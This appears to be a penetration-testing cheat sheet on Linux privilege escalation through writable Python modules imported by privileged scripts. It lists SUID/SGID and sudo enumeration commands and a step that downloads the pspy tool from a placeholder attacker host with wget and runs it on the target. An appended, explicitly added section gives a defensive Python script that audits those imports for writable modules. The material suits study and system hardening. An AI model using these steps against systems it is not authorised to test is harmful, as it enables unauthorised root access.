PRIMARY CATEGORY → LINUX PRIVESC
Write Permissions on Imported Python Module
Requirements
- The Python Script must be executed by a user with more privileges than the current one
- The current user must have read permissions on the Python Script
- The current user must have write permissions on the Module imported by the Python Script
Scenarios & Cases
The situation described by the first requirement can arise in the following scenarios →
SUID Binary
The attacker finds a binary which has the SUID special permission enabled
find / -perm -4000 -type f -ls 2> /dev/null # Any file with the SUID bit set, whatever its other mode bits
find / -perm -4000 -user root -type f -ls 2> /dev/null # Root as File Owner
Therefore, it only remains to find the Python Modules that are imported by the Python Script
SGID Binary
The same applies here
find / -perm -2000 -type f -ls 2> /dev/null # Any file with the SGID bit set, whatever its other mode bits
find / -perm -2000 -group root -type f -ls 2> /dev/null # Root as Group Owner
Sudo Privilege
The attacker checks if the current user has any type of sudo privileges as follows →
sudo -l
It appears that the user has privileges to execute a particular Python Script as Any User (ALL)
So the same applies here: if the attacker has read permissions on the Python Script, he just examines its content to see what modules it imports
Cron Job
There may be a Cron Job or task that is executed recurrently on the system by a user with more privileges than the current one
Download a tool like PsPy and transfer it to the target to monitor them all
- From the Attacker
curl --silent --request GET --remote-name --location "https://github.com/DominicBreuker/pspy/releases/download/vX.X.X/pspy64"
python3 -m http.server <PORT>
- From the Target
wget "http://<ATTACKER>:<PORT>/pspy64" -O pspy64
chmod 700 !$ && ./pspy64
Once the attacker finds a Cron Job that executes a Python Script, he just needs read permissions on it to check its content and see what Python Modules it imports
Important
As mentioned earlier, the current user must have write permissions on the imported python module in order to modify it and escalate privileges when the privileged user executes the script
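An audit for this condition from the administrator's side, as an added example that is not part of the original page: it statically lists the modules a privileged Python Script imports and reports any whose file or directory is group- or world-writable. The function names are hypothetical, and modules are resolved with the auditing interpreter's own sys.path, which is assumed to match the privileged user's.

```python
import ast, os, stat, sys, tempfile
from importlib.machinery import PathFinder

def imported_modules(script):
    """Top-level module names the script imports (static AST parse; nothing is executed)."""
    with open(script, "rb") as fh:
        tree = ast.parse(fh.read(), filename=script)
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(a.name.split(".")[0] for a in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)

def audit(script, extra_path=()):
    """Return [(module, path, reason)] for imports a non-owner could modify."""
    # The script's own directory is searched first, as it is when the script runs.
    search = [os.path.dirname(os.path.abspath(script)), *extra_path, *sys.path]
    findings = []
    for name in imported_modules(script):
        spec = PathFinder.find_spec(name, search)
        if spec is None or not spec.origin or not os.path.isfile(spec.origin):
            continue  # built-in, frozen or unresolved: no file on disk to check
        checks = ((spec.origin, "module file"),
                  (os.path.dirname(spec.origin), "module directory"))
        for target, what in checks:
            mode = os.stat(target).st_mode
            if mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((name, target,
                                 f"{what} is group/world-writable ({stat.filemode(mode)})"))
    return findings

def demo():
    """Constructed sample: a script that imports one world-writable module."""
    d = tempfile.mkdtemp()
    mod, script = os.path.join(d, "constructed_helper.py"), os.path.join(d, "job.py")
    for path, body, mode in ((mod, "VALUE = 1\n", 0o666),
                             (script, "import os\nimport constructed_helper\n", 0o644)):
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, mode)
    return mod, audit(script)

if __name__ == "__main__":
    for name, path, reason in demo()[1]:
        print(f"{name}: {path}: {reason}")
```

The check looks only at mode bits, so write access granted through ownership or POSIX ACLs has to be reviewed separately; the fix for a finding is to remove group/other write permission from the module and its directory.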